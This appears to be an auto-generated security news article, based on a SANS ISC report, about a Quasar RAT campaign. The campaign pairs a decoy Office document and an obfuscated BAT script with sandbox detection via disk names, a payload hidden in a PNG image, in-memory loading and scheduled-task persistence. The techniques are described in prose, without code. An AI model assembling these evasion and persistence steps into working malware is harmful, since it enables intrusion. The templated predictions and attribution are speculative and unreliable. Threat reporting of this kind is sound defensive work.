Listen to this Post
A Silent Threat in Disguise
Cybercriminals are constantly evolving their techniques to stay one step ahead of security defenses. One of the most persistent remote access trojans (RATs), Quasar RAT, has recently resurfaced with a clever twist in its delivery method. Instead of using traditional executable files, this new campaign leverages obfuscated BAT files and deceptive Office documents to quietly deploy its payload. By embedding PowerShell scripts within highly scrambled code, attackers evade detection and maintain persistence through advanced scripting and scheduled tasks. This new wave shows just how determined threat actors are in refining their methods while maintaining the same malicious goals: control, exfiltration, and evasion.
Quasar RAT Hides Behind BAT Scripts and Decoy Documents
A new campaign delivering the notorious Quasar RAT has been identified, showcasing a highly obfuscated second-stage BAT script embedded within a fake Office document. The initial dropper script, camouflaged as a document named Game_Purchase_Agreement (1).docx, cleverly initiates the download of a malicious batch file from a remote URL hosted on Gofile. Once the document is opened, it executes the batch script silently using PowerShell.
The downloaded stub.bat file is extremely obfuscated, employing a combination of broken environment variable strings, ‘goto’ jumps, and misleading function names to obscure its logic. VirusTotal gives it a detection score of only 1/61, showing how effectively it evades antivirus systems.
Once executed, the BAT script triggers two PowerShell processes. The first checks whether the malware is running in a sandbox environment by analyzing the system disk names. If it detects sandbox-related disk names like “QEMU HARDDISK” or “DADY HARDDISK,” it forcefully terminates the command process, thereby avoiding detection and analysis.
The second PowerShell process carries out the actual payload delivery. It downloads a seemingly benign PNG file from a remote image hosting site (i[.]ibb[.]co), but this image contains an encrypted and compressed Quasar RAT payload hidden within it. The PowerShell code then decrypts and decompresses the content using Triple DES encryption and GZip streams, finally loading the malicious code into memory via reflection and assembly methods like GetAssemblies, System.Reflection.Assembly, and Invoke.
Further persistence is achieved by creating a scheduled task using a malicious XML file, ensuring that the RAT stays active even after reboot. The malware’s C2 server is hosted through portmap.io under the subdomain JamieRose-42682[.]portmap[.]io. This highly stealthy and complex delivery method signals a strong return of Quasar RAT, reinforcing its status as a persistent threat in the cybersecurity landscape.
What Undercode Say:
A Masterclass in Obfuscation
The use of BAT scripts for malware delivery is not new, but the level of obfuscation used in this case is noteworthy. Every aspect of the attack chain is designed to confuse analysts and bypass static detection. Variable names are random, control flow is broken using arbitrary goto statements, and even the core logic is spread across split environment variables. This makes the malware extremely difficult to deconstruct.
Sandboxes Beware
One particularly innovative feature is the sandbox detection technique. Rather than relying on process names or system artifacts that could be easily faked or disabled, the malware reads actual disk names to identify virtualized environments. This kind of check is less common and highly effective, adding a layer of anti-analysis protection.
From Images to Infection
The delivery of the payload through a PNG image demonstrates an advanced level of stealth. The use of PowerShell to decode, decrypt, decompress, and execute this image-based payload in memory means there’s no executable file ever dropped to disk. This fileless nature dramatically lowers the chances of detection by endpoint protection systems.
Persistence is Key
To ensure the RAT maintains control even after reboot, the attacker uses a scheduled task with a custom XML configuration. This persistent backdoor guarantees long-term access to the victim’s system, which could then be exploited for data exfiltration, remote control, or lateral movement.
C2 Infrastructure Points to Portmap.io
Using dynamic DNS and port forwarding platforms like Portmap.io helps attackers mask their C2 infrastructure. These services allow attackers to change IP addresses dynamically and avoid takedowns, making attribution and shutdown efforts more challenging.
Infection Timeline and Tactics
The campaign cleverly uses trusted file types and social engineering, encouraging the victim to click on what appears to be a document. As soon as it’s opened, PowerShell kicks in silently, leaving little trace. From the moment the decoy is opened, every step is automated, efficient, and quiet.
Implications for Defenders
Defenders must evolve their detection capabilities to monitor for suspicious PowerShell activity, not just known malware signatures. Monitoring for obfuscated scripts, anomalous scheduled tasks, and base64 activity in memory is essential to catch such stealthy threats.
Threat Actor Sophistication
This campaign indicates a skilled actor who understands both technical execution and social engineering. It is likely the product of an advanced threat group or an individual with substantial experience in offensive security techniques.
Future Risks
With Quasar RAT now resurfacing in more stealthy formats, similar techniques may soon be adopted by other RAT families and malware types. We might see a rise in “invisible” malware embedded in images, scripts, and even hardware metadata.
A Call for Proactive Defense
Organizations should deploy behavior-based detection, enforce strict PowerShell execution policies, and train staff to recognize decoy document tactics. The time to shift from reactive to proactive cybersecurity has never been more urgent.
Fact Checker Results:
✅ This campaign uses Quasar RAT
✅ Delivery is executed via obfuscated BAT and PowerShell scripts
⚠️ Payload hidden in image-based encryption is a rising tactic
🕵️♂️🔒📁
Prediction:
This Quasar RAT variant may pave the way for more image-embedded, fileless malware attacks in the near future. Expect increased use of native Windows tools like PowerShell, WMI, and scheduled tasks for malware deployment. Security vendors will likely update behavioral detection engines to catch sandbox detection tricks and image-based payloads. As attackers keep refining their stealth, defenders must invest more in anomaly detection and threat hunting based on behavior patterns rather than static signatures. 🧠💻🛡️
References:
Reported By: isc.sans.edu
Extra Source Hub:
https://www.twitter.com
Wikipedia
Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
